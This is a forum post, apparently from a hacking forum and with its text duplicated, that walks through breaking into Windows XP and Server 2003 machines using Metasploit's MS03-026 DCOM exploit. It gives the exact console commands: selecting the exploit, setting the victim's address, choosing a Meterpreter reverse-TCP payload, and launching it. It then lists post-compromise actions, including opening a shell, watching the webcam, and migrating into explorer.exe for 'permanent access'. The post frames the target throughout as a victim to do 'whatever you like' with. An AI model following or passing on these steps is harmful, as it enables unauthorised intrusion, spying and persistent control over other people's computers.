Hacking Windows Xp And Windows Server 2003 With Dcom in Metasploit 05-26-2013, 08:25 AM
#1
Hacking Windows Server 2003 and Windows Xp with Dcom Exploit In Metasploit
Metasploit: - Metasploit is an framework which is used for the hacking of different kinds of applications, operating systems, web applications etc. Metasploit contains various exploits, payloads, modules etc. and in 21st century it is used by most of the hackers, security researchers for exploiting different kinds of operating systems like windows xp, windows 2003, windows vista, windows 8 and etc and it is also called as hackers helping hand because by default all is setup already for hacking systems and applications and web applications and it is also used by security researchers for pretesting .
According to Wikipedia:- The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shell code archive, and security research.
The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
So by default there are 927 exploits in Metasploit and 251 payloads
So Metasploit comes in backtrack by default and Metasploit is also available for windows you can download it from its official site
http://www.metasploit.com/
![[Image: gEla1nN.png]](http://i.imgur.com/gEla1nN.png)
So Let’s Proceed Further So We are Going To Hack Windows xp with Metasploit with exploit Dcom and this exploit is basically work on windows server 2003 and also works on windows xp service pack 1 and service pack 2
Things We Need:-
1. Vm-Workstation
2. Backtrack in Vm-Workstation
3. Windows xp installed in Vm Workstation
4. Updated Version Of Metasploit use command to update Metasploit (msfupdate)
Let’s Proceed Open Both Os Backtrack and Windows in Xp
1. Change The Network Connection In VMware From Nat To Bridged But when updating Metasploit keep the connection type NAT so after doing all these open terminal in backtrack and type msfconsole (to open Metasploit)
![[Image: avxF2o3.png]](http://i.imgur.com/avxF2o3.png)
After that type search Dcom (exploit name)
![[Image: qgHhuB3.png]](http://i.imgur.com/qgHhuB3.png)
It will give you results as I have shown in image select and copy it by right selecting and right clicking on it
Exploits/windows/dcerpc/ms03_026_dcom
After that type next command 4
root@bt:~#Use Exploits/windows/dcerpc/ms03_026_dcom
![[Image: 6wljmFx.png]](http://i.imgur.com/6wljmFx.png)
Then Type Command set RHOST (here RHOST refers to the victim’s ip address)
Set RHOST 192.168.2.12 (my victim’s ip)
![[Image: tNuUr2r.png]](http://i.imgur.com/tNuUr2r.png)
After that use command
Set Payload windows/meterpreter/reverse_tcp
![[Image: lRN9bOB.png]](http://i.imgur.com/lRN9bOB.png)
So payload is the part of a computer virus which performs a malicious action on the victim’s machine and give us access on victim’s pc to do whatever we like to do simply payload is like a weapon that we give to solider to breach into enemies territory .
Then Use command
Set LHOST 192.168.2.5 (your ip)
To check your ip in backtrack use command
Ifconfig
Also use command
Show targets
After that use command
Set Target 0
![[Image: iPb6kyV.png]](http://i.imgur.com/iPb6kyV.png)
Type Command
Exploit
![[Image: c2k8aSw.png]](http://i.imgur.com/c2k8aSw.png)
After that wait few seconds and Boom you got access to victim’s pc now you can Do whatever You Like To do With Victim’s Pc
You Can Use commands After Getting Access To Victim’s Pc
1. Sysinfo
2. Shell
3. Show webcam
4. Shutdown
5. Restart
To Get Permanent access to victim’s pc use command
1. Pwd
2. Ps
3. Migrate to explorer.exe (use explore.exe pid not name )
4. And when successfully done you got permanent access
For More Info Contact on My Email Address
Codedindisoul@Gmail.com
Follow Me On twitte
Coded Indisoul
Add Me on Skype
Manjot 511
Metasploit: - Metasploit is an framework which is used for the hacking of different kinds of applications, operating systems, web applications etc. Metasploit contains various exploits, payloads, modules etc. and in 21st century it is used by most of the hackers, security researchers for exploiting different kinds of operating systems like windows xp, windows 2003, windows vista, windows 8 and etc and it is also called as hackers helping hand because by default all is setup already for hacking systems and applications and web applications and it is also used by security researchers for pretesting .
According to Wikipedia:- The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shell code archive, and security research.
The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
So by default there are 927 exploits in Metasploit and 251 payloads
So Metasploit comes in backtrack by default and Metasploit is also available for windows you can download it from its official site
http://www.metasploit.com/
![[Image: gEla1nN.png]](http://i.imgur.com/gEla1nN.png)
So Let’s Proceed Further So We are Going To Hack Windows xp with Metasploit with exploit Dcom and this exploit is basically work on windows server 2003 and also works on windows xp service pack 1 and service pack 2
Things We Need:-
1. Vm-Workstation
2. Backtrack in Vm-Workstation
3. Windows xp installed in Vm Workstation
4. Updated Version Of Metasploit use command to update Metasploit (msfupdate)
Let’s Proceed Open Both Os Backtrack and Windows in Xp
1. Change The Network Connection In VMware From Nat To Bridged But when updating Metasploit keep the connection type NAT so after doing all these open terminal in backtrack and type msfconsole (to open Metasploit)
![[Image: avxF2o3.png]](http://i.imgur.com/avxF2o3.png)
After that type search Dcom (exploit name)
![[Image: qgHhuB3.png]](http://i.imgur.com/qgHhuB3.png)
It will give you results as I have shown in image select and copy it by right selecting and right clicking on it
Exploits/windows/dcerpc/ms03_026_dcom
After that type next command 4
root@bt:~#Use Exploits/windows/dcerpc/ms03_026_dcom
![[Image: 6wljmFx.png]](http://i.imgur.com/6wljmFx.png)
Then Type Command set RHOST (here RHOST refers to the victim’s ip address)
Set RHOST 192.168.2.12 (my victim’s ip)
![[Image: tNuUr2r.png]](http://i.imgur.com/tNuUr2r.png)
After that use command
Set Payload windows/meterpreter/reverse_tcp
![[Image: lRN9bOB.png]](http://i.imgur.com/lRN9bOB.png)
So payload is the part of a computer virus which performs a malicious action on the victim’s machine and give us access on victim’s pc to do whatever we like to do simply payload is like a weapon that we give to solider to breach into enemies territory .
Then Use command
Set LHOST 192.168.2.5 (your ip)
To check your ip in backtrack use command
Ifconfig
Also use command
Show targets
After that use command
Set Target 0
![[Image: iPb6kyV.png]](http://i.imgur.com/iPb6kyV.png)
Type Command
Exploit
![[Image: c2k8aSw.png]](http://i.imgur.com/c2k8aSw.png)
After that wait few seconds and Boom you got access to victim’s pc now you can Do whatever You Like To do With Victim’s Pc
You Can Use commands After Getting Access To Victim’s Pc
1. Sysinfo
2. Shell
3. Show webcam
4. Shutdown
5. Restart
To Get Permanent access to victim’s pc use command
1. Pwd
2. Ps
3. Migrate to explorer.exe (use explore.exe pid not name )
4. And when successfully done you got permanent access
For More Info Contact on My Email Address
Codedindisoul@Gmail.com
Follow Me On twitte
Coded Indisoul
Add Me on Skype
Manjot 511

![[+]](https://sinister.li/images/modern/collapse_collapsed.png)